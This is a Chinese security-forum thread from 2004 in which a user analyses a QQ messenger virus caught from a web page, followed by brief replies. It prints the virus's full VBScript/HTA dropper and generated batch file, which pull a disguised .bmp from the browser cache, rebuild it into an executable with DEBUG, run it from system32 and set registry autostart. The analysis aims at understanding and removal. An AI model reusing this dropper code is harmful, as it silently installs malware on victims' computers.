|
 | 作者: wangsong [wangsong]
 论坛用户 |
登录 |
| 作者:飞天剑客
http://www.wwwzsl.com QQ病毒在网上有很多种也很常见,在网上也非常多,相信大家也都种过,我以前也常种这种病毒,这次是我对QQ病毒的一些研究,有什么不对我地方希望大家指出, 一日一朋友发过来一个网址说是他的网站,我打开以看什么呀,分明是个不够18不让看的网站(大家都猜到了)打开以后出现了两个对话框 同时还会打开好几个网页(这几个就有可能是下载病毒的),从那以后我的QQ就有了个小尾巴了,发什么我的照片了,我的心事了…………….反正很多的了,现在都是用IE漏洞进行下载,然后在用VBS语言进行什么运行呀, 修改呀最后就是运行了,我不会VBS难免会有不对的地方,右点鼠标没有禁止,那就当然是看原文件了其内容: <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> <HTA:APPLICATION caption="no" border="none" windowState="minimize" > <script LaNGUAGE="VBScript"> Set g_fs = CreateObject("Scripting.FileSystemObject") Set tf = g_fs.CreateTextFile("c:\win.hta",true) 创建文件 tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10) tf.write "<object id='wsh' cl"& chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10) tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10) tf.write "on error resume next"&chr(13)&chr(10) tf.write "window.moveTo 0,0"&chr(13)&chr(10) tf.write "window.resizeTo 0,0 "&chr(13)&chr(10) tf.write "dim exepath"&chr(13)&chr(10) tf.write "Function Search(objFolder) "&chr(13)&chr(10) tf.write "Dim objSubFolder"&chr(13)&chr(10) tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10) tf.write "If InStr(1, objfile.name, " & CHR(34)& "lhxyexe" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10) tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10) tf.write "filecp.copy (exepath)"&chr(13)&chr(10) tf.write "exit for"&chr(13)&chr(10) tf.write "End If"&chr(13)&chr(10) tf.write "Next "&chr(13)&chr(10) tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10) tf.write "Search objSubFolder"&chr(13)&chr(10) tf.write "Next"&chr(13)&chr(10) tf.write "End Function"&chr(13)&chr(10) tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10) tf.write "str=WSH.regread(" & CHR(34)& "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10) tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10) tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10) tf.write "exepath=othisfolder.path & "& chr(34) & "win.exe" & chr(34) &chr(13)&chr(10) tf.write "search tempfolder"&chr(13)&chr(10) tf.write "wsh.run (exepath)"&chr(13)&chr(10) tf.write "wsh.run " & CHR(34)& "command.com /c del c:\win.hta" & CHR(34)& " ,0"&chr(13)&chr(10) 运行后删掉文件 tf.write "window.close()"&chr(13)&chr(10) tf.write "<" &chr(47)& "script>"&chr(13)&chr(10) tf.close wsh.run "c:\win.hta",0 window.close () </script> 以上就是原代码了:有的我加了点注释,它的意思就是创建一个c:\win.hta文件然后往里面内容,写完以在运行一次然后删掉,再看看它创建的win.hta的这个文件吧,内容如下; <SCRIPT LANGUAGE="VBScript"> 'by 陈经韬.2003.11.http://www.138soft.com,lovejingtao@21cn.com Option Explicit Dim FSO,WSH,CACHE,str,sucess Set FSO = CreateObject("Scripting.FileSystemObject") Set WSH = CreateObject("WScript.Shell") CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") 创建文件路径 sucess=0 sub FF SearchBMPFile fso.GetFolder(CACHE),"ClientQQS[1].bmp"原病毒文件 if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"ClientQQS[2].bmp" End sub Function SearchBMPFile(Folder,fname) Dim SubFolder,File,Lt,tmp,winsys str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname'); if FSO.FileExists(str) then tmp=fso.GetSpecialFolder(2) & "\" winsys=fso.GetSpecialFolder(1) & "\" set File=FSO.GetFile(str) File.Copy(tmp & "tmp.dat") On Error Resume Next File.Delete if FSO.FileExists(str) then exit function set Lt=FSO.CreateTextFile(tmp & "tmp.in") Lt.WriteLine("rbx") Lt.WriteLine("0") Lt.WriteLine("rcx") '下面的数字是十六进制的EXE文件的大小 Lt.WriteLine("8000") Lt.WriteLine("w136") Lt.WriteLine("q") Lt.Close set Lt=FSO.CreateTextFile(tmp & "tmp.bat") Lt.WriteLine("@echo off") Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "ClientQQS.exe>" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine(winsys & "ClientQQS.exe") Lt.Close WSH.Run tmp & "tmp.bat",false,6 创建tmp.bat文件并写入内容 On Error Resume Next 'FSO.GetFile(tmp & "tmp.bat").Delete sucess=1 msgbox "好像好爽的感觉......" end if If Folder.SubFolders.Count <> 0 Then For Each SubFolder In Folder.SubFolders SearchBMPFile SubFolder,fname Next End If End Function </script> <SCRIPT language=JavaScript> function F() { FF(); if (sucess==0) setTimeout("F()", 2000); } setTimeout("F()", 2000); </SCRIPT> <body> 正在连接服务器....请不要关闭! </body> </html> 它的意思是创建一个tmp.bat文件bat文件是批处理文件,找到以后打开看看是什么: @echo off debug D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.dat <D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.in >D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out copy D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.dat D:\WINNT\system32\ClientQQS.exe>D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out del D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.dat >D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out del D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.in >D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out D:\WINNT\system32\ClientQQS.exe 哈哈!!!!!知道了吧,是用DEBUG把tmp.dat文件专还成ClientQQS.exe文件,最后复制到系统文件下,并运行 发信息的文件有可能就是它了. 还有就是注册表是它些文件常常要动的地方,先看看RUN下有没有什么可疑的启动文件 在HKEY_LOCAL_MACHINE\SOFTWARE\MICOSOFT\WINDOWS\currentversion\runserviecs\ HKEY_LOCAL_USER\SOFTWARE\MICOSOFT\WINDOWS\currentversion\run\ 都发现了这个QQINFO.EXE可疑的文件呀,怎么又多出这么个文件呀,它是干什么的,后来我才发现它就是 ClientQQS.exe只不过名子不一样,好了 它的从下载到运行的大概原理可清楚了,先是别有发给你一个网址当然找开以后,它会用IE漏洞下载一个.bmp到本地硬盘然后用VBS语言创建win.hta文件.在用win.hta文件在创建tmp.bat,的同时也会ClientQQS[1].bmp文件变成DAT文件在用TMP.bat调用DEBUG把ClientQQS[1].bmp文件转变成ClientQQS.exe复制到 %systemroot%\system32\文件夹下,而ClientQQS.exe文件会复制自己到winnt文件夹下改名为QQINFO.EXE 最后运行QQINFO.EXE文件 怎么清除相信你也知道了吧,我也就不多说了 |
| 地主 发表时间: 04-04-21 15:19 |
 | 回复: ghame [ghame]  论坛用户 |
登录 |
|
分析挺详细的,还是原创,支持一下! |
| B1层 发表时间: 04-04-21 18:58 |
| 回复: hkcc [hkcc] 论坛用户 |
登录 |
|
鼎鼎顶峰~ |
| B2层 发表时间: 04-04-24 00:10 |
 | 回复: EvSpirit [aeolian] 论坛用户 |
登录 |
|
我记得有专杀! |
| B3层 发表时间: 04-04-24 20:23 |
| 回复: wangsong [wangsong] 论坛用户 |
登录 |
|
这样不就知道原理了吗 |
| B4层 发表时间: 04-04-24 22:17 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 我对QQ病毒的一些研究